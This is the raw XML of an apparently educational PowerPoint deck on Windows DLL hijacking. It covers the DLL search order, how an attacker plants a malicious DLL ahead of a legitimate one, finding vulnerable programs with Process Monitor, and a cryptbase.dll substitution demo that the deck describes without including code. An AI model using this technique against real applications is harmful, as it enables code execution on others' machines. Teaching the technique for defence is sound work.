      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="312553410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arn(inVertic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inVertic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arn(inVertical)">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P spid="8" grpId="0"/>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342055"/>
            <a:ext cx="7181447" cy="584775"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" i="1" u="sng" dirty="0" smtClean="0"/>
              <a:t>Module Search Order</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="Rectangle 16"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="548959" y="959187"/>
            <a:ext cx="6096000" cy="400110"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>- In Windows 7, XP Service Pack 2 and above:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Rectangle 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1759897" y="1759405"/>
            <a:ext cx="6096000" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Calling Application </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Directory </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Rectangle 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1773056" y="2159513"/>
            <a:ext cx="6096000" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>- System Directory (C:\Windows\System32)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Rectangle 10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1759897" y="2528848"/>
            <a:ext cx="7193071" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>16-bit System Directory (C:\Windows\System)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent6"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Rectangle 11"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1759897" y="2944344"/>
            <a:ext cx="6096000" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>-  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Windows </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Directory (C:\Windows)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent6"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Rectangle 12"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1759897" y="3359843"/>
            <a:ext cx="6938626" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Current Working Directory</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent6"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="Rectangle 13"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1773056" y="3775339"/>
            <a:ext cx="6938626" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>- Directories in PATH environment variables</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="Rectangle 15"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="548958" y="4452445"/>
            <a:ext cx="9783762" cy="400110"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>- Current Working Directory moved lower down</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="Rectangle 17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1158558" y="4821775"/>
            <a:ext cx="9783762" cy="400110"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>- Still ways to cause an attack</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="210409749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arn(inVertical)">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arn(inVertical)">
                                      <p:cBhvr>
                                        <p:cTn id="4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8" grpId="0"/>
      <p:bldP spid="10" grpId="0"/>
      <p:bldP spid="11" grpId="0"/>
      <p:bldP spid="12" grpId="0"/>
      <p:bldP spid="13" grpId="0"/>
      <p:bldP spid="14" grpId="0"/>
      <p:bldP spid="16"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342055"/>
            <a:ext cx="7181447" cy="584775"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" i="1" u="sng" dirty="0" smtClean="0"/>
              <a:t>Attack Principle</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="Rectangle 16"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="548958" y="959187"/>
            <a:ext cx="7066687" cy="400110"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>- Attacker finds DLLs that an application is trying to find</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Rounded Rectangle 1"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1331498" y="1897519"/>
            <a:ext cx="2207623" cy="809897"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent3"/>
          </a:solidFill>
          <a:ln w="28575">
            <a:solidFill>
              <a:schemeClr val="tx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App.exe</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="Rounded Rectangle 18"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6485708" y="1896980"/>
            <a:ext cx="2207623" cy="809897"/>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Req.dll, resides in C:\Windows</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="21" name="Straight Arrow Connector 20"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4232365" y="2301929"/>
            <a:ext cx="18418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944984" y="1743631"/>
            <a:ext cx="2373561" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>lpLoadLibrary</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>(Req.dll</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>);</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24" name="Rectangle 23"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="548957" y="3277532"/>
            <a:ext cx="7915774" cy="400110"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>- Attacker places malicious DLL higher up the search order</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25" name="Rectangle 24"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="548957" y="3709999"/>
            <a:ext cx="7915774" cy="400110"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>- Application loads malicious DLL instead of legitimate one</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="162811127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 calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="16" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="22"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="17" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="22"/>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additive="base">
                                        <p:cTn id="20" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="19"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="21" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="19"/>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additive="base">
                                        <p:cTn id="24" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="21"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="25"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barn(inVertical)">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barn(inVertical)">
                                      <p:cBhvr>
                                        <p:cTn id="3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 grpId="0" animBg="1"/>
      <p:bldP spid="19" grpId="0" animBg="1"/>
      <p:bldP spid="22"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342055"/>
            <a:ext cx="7181447" cy="584775"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" i="1" u="sng" dirty="0" smtClean="0"/>
              <a:t>Finding Vulnerable Applications</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="Rectangle 16"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="548958" y="959187"/>
            <a:ext cx="9718448" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>- Can use Process Monitor to see which DLLs an application calls </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Rectangle 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="548958" y="1596795"/>
            <a:ext cx="9718448" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>- Allows someone to see which DLLs are trying to be loaded</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Rectangle 10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="640398" y="2234403"/>
            <a:ext cx="9718448" cy="830997"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>- Vulnerability if we notice a DLL can’t be found (unsafe use of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>LoadLibary</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Rectangle 11"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="640398" y="3065400"/>
            <a:ext cx="9718448" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>Procmon</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t> Demo</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Rectangle 12"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="640398" y="3527065"/>
            <a:ext cx="9718448" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>- In reality finding a suitable DLL can be a trial and error process</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Rectangle 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="682380" y="3988730"/>
            <a:ext cx="9718448" cy="830997"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>- A more sophisticated attack can use DLL debugging to learn more about a DLL</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="179300621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0" grpId="0"/>
      <p:bldP spid="11" grpId="0"/>
      <p:bldP spid="12" grpId="0"/>
      <p:bldP spid="13"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48959" y="342055"/>
            <a:ext cx="7181447" cy="584775"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" i="1" u="sng" dirty="0" smtClean="0"/>
              <a:t>Writing a simple DLL</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="Rectangle 16"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="548958" y="959187"/>
            <a:ext cx="9718448" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>- Can write a simple DLL to demonstrate the attack in action</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Rectangle 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="548958" y="1420852"/>
            <a:ext cx="9718448" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>- Code and Demo.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Rectangle 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="548958" y="1882517"/>
            <a:ext cx="9718448" cy="830997"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>- Substituting cryptbase.dll results in the created DLL to run instead of the real cryptbase.dll which is located in System32.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="359836812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7" grpId="0"/>
      <p:bldP spid="8" grpId="0"/>
    </p:bld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B4B4B"/>
      </a:dk2>
      <a:lt2>
        <a:srgbClr val="8ED5C1"/>
      </a:lt2>
      <a:accent1>
        <a:srgbClr val="73CBB2"/>
      </a:accent1>
      <a:accent2>
        <a:srgbClr val="AACD5B"/>
      </a:accent2>
      <a:accent3>
        <a:srgbClr val="65A9E1"/>
      </a:accent3>
      <a:accent4>
        <a:srgbClr val="6274D8"/>
      </a:accent4>
      <a:accent5>
        <a:srgbClr val="AB54D7"/>
      </a:accent5>
      <a:accent6>
        <a:srgbClr val="D15B37"/>
      </a:accent6>
      <a:hlink>
        <a:srgbClr val="BFE962"/>
      </a:hlink>
      <a:folHlink>
        <a:srgbClr val="C0D591"/>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47428100-C732-4B2E-A30A-5273F581A0F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1317</TotalTime>
  <Words>2641</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>Widescreen</PresentationFormat>
  <Paragraphs>291</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Corbel</vt:lpstr>
      <vt:lpstr>Depth</vt:lpstr>
      <vt:lpstr>DLL HIJACKING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DLL HIJACKING</dc:title>
  <dc:creator>Waleed</dc:creator>
  <cp:lastModifiedBy>Waleed</cp:lastModifiedBy>
  <cp:revision>155</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2016-01-12T02:43:08Z</dcterms:created>
